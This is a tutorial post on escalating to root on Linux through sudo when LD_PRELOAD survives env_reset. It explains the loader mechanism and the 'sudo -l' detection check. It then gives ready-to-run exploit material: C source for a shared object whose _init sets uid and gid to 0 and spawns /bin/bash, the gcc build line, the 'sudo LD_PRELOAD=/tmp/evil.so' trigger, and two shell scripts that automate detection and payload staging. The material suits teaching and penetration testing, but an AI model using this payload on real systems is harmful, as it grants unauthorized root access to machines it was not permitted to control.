
Sudo (LD_PRELOAD) (Linux Privilege Escalation)

Published by Touhid Shaikh on April 12, 2018

Privilege escalation through the LD_PRELOAD environment variable. Before the exploit, a few words
about what LD_PRELOAD does.

Index
1. What is LD_PRELOAD?
2. Detection.
3. Exploit LD_PRELOAD.

What is LD_PRELOAD?
LD_PRELOAD is an optional environment variable containing one or more paths to shared
libraries (shared objects) that the dynamic loader maps before any other shared library,
including the C runtime library (libc.so). This is called preloading a library. Because a
preloaded library is searched first, its symbols override same-named functions in the
program and in libc, and its initialiser runs before the program's main().

To stop this mechanism from being used as an attack vector against set-uid/set-gid binaries,
the loader runs them in secure-execution mode (ruid != euid or rgid != egid): LD_PRELOAD
entries containing a slash are ignored, and only libraries found in the standard search
directories that are themselves set-user-ID are preloaded.

See ld.so(8) for the full rules.

Detection
Fire up a terminal and type:

user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

If the output looks like this, the target is vulnerable. sudo's default env_reset strips
LD_PRELOAD (and the other LD_* variables) from the environment it hands to the command, but
env_keep+=LD_PRELOAD explicitly exempts it. sudo itself is set-uid, so the loader ignores
LD_PRELOAD for the sudo process; the command sudo then executes, however, runs with
ruid == euid == 0, the loader is not in secure-execution mode, and it maps our library as root.

To complete the privilege escalation you also need at least one command you are permitted to
run through sudo; `sudo -l` lists those as well.
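The check described above, as an added example that is not part of the original post: a small POSIX shell script that parses `sudo -l` output for both preconditions (LD_PRELOAD in env_keep, and at least one permitted command). The `sudo -l` transcript embedded in it is constructed for the demonstration; on a real target replace it with the live output.

```shell
#!/bin/sh
# Added example (not from the original post): parse `sudo -l` output for the
# two things this technique needs: (1) LD_PRELOAD surviving env_reset via
# env_keep and (2) at least one command the user may run through sudo.
# SAMPLE_SUDO_L is a constructed transcript; on a target use:
#   SUDO_L=$(sudo -n -l 2>/dev/null)

SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) /usr/bin/find'

# Exit status 0 when an env_keep entry mentions LD_PRELOAD.
ld_preload_kept() {
    printf '%s\n' "$1" | grep -Eq 'env_keep[+]?=[^,]*LD_PRELOAD'
}

# Print the command part of every "(runas) [NOPASSWD:] command" line.
sudo_commands() {
    printf '%s\n' "$1" |
        sed -E -n 's/^[[:space:]]*\([^)]*\)[[:space:]]*(NOPASSWD:[[:space:]]*)?//p'
}

# Exit status 0, plus the list of usable commands, when both conditions hold.
check_ld_preload_sudo() {
    sudo_l="$1"
    if ! ld_preload_kept "$sudo_l"; then
        echo "LD_PRELOAD is not in env_keep; sudo's env_reset will drop it"
        return 1
    fi
    cmds=$(sudo_commands "$sudo_l")
    if [ -z "$cmds" ]; then
        echo "env_keep has LD_PRELOAD but no sudo commands are permitted"
        return 1
    fi
    echo "env_keep+=LD_PRELOAD and sudo-permitted commands found:"
    printf '%s\n' "$cmds"
    return 0
}

check_ld_preload_sudo "$SAMPLE_SUDO_L"
```

Any command printed by `sudo_commands` will do as the trigger; the library is mapped before the command's main() runs, so the command's own behaviour is irrelevant.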

Program file:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Runs when the loader maps this library, before the target's main(). */
void _init(void) {
    unsetenv("LD_PRELOAD");   /* don't re-trigger in the shell we spawn */
    setgid(0);                /* make gid/uid 0 explicit before the shell */
    setuid(0);
    system("/bin/bash");
}

Exploit LD_PRELOAD.
Open a terminal and change to any writable directory to drop the shell library in.

Writable directories are typically

 /tmp
 /var/tmp
 /dev/shm

In our case we use the /tmp directory.

Create evil.c with any text editor; here we use cat to write it:

user@debian:/tmp$ cat << 'EOF' > evil.c
> #include <stdio.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <unistd.h>
> void _init(void) {
>     unsetenv("LD_PRELOAD");
>     setgid(0);
>     setuid(0);
>     system("/bin/bash");
> }
> EOF

Compile it into a shared object. -nostartfiles is needed because we supply our own _init; without it the link would clash with the _init from the toolchain's crti.o.

gcc -fPIC -shared -o evil.so evil.c -nostartfiles

Time for the final step :)

sudo LD_PRELOAD=/tmp/evil.so <COMMAND>

Here <COMMAND> is any command you are allowed to run with sudo; take it from the `sudo -l`
output. Give the full path of the library: a bare `evil.so` contains no slash, so the loader
looks for it in the library search path rather than the current directory, reports that it
cannot be preloaded, and runs the command without it.

BooOO00m, you have a root shell.
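The whole procedure (drop the source, build the shared object, form the sudo invocation) as one added example, not code from the original post. The staging directory, the name evil.so and the trigger command /usr/sbin/iftop are assumptions for illustration; substitute any command from your own `sudo -l` output.

```shell
#!/bin/sh
# Added example (not from the original post): stage the preload payload and
# build the sudo invocation. /tmp, evil.so and /usr/sbin/iftop are assumed.

# Source of the shared object. _init runs when the loader maps the library,
# before the command's main(); unsetenv() keeps the payload from re-triggering
# in the spawned shell and in anything that shell executes.
PAYLOAD_SRC='#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

void _init(void) {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
'

# Write the source into a writable staging directory (default /tmp);
# prints the path of the .c file.
write_payload() {
    dir="${1:-/tmp}"
    printf '%s' "$PAYLOAD_SRC" > "$dir/evil.c"
    echo "$dir/evil.c"
}

# Compile as a shared object; prints the path of the .so file.
# -nostartfiles is required because we define our own _init; otherwise the
# toolchain's crti.o supplies one and the link fails with a duplicate symbol.
build_payload() {
    src="$1"
    out="${src%.c}.so"
    gcc -fPIC -shared -nostartfiles -o "$out" "$src" && echo "$out"
}

# Print the sudo command line. The .so path must contain a slash: a bare name
# such as evil.so is searched in the library path, not the current directory,
# and the loader reports it cannot be preloaded and runs the command without it.
sudo_preload_cmd() {
    so="$1"
    cmd="$2"
    case "$so" in
        */*) ;;
        *) echo "refusing: '$so' has no slash, use an absolute path" >&2; return 1 ;;
    esac
    printf 'sudo LD_PRELOAD=%s %s\n' "$so" "$cmd"
}

# On a target with gcc available:
#   src=$(write_payload /tmp) && so=$(build_payload "$src") &&
#       sudo_preload_cmd "$so" /usr/sbin/iftop
# then run the printed line to get the root shell.
sudo_preload_cmd /tmp/evil.so /usr/sbin/iftop
```

If gcc is not installed on the target, build evil.so on a machine with a matching libc and architecture and copy it over; only the final sudo line has to run on the target.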
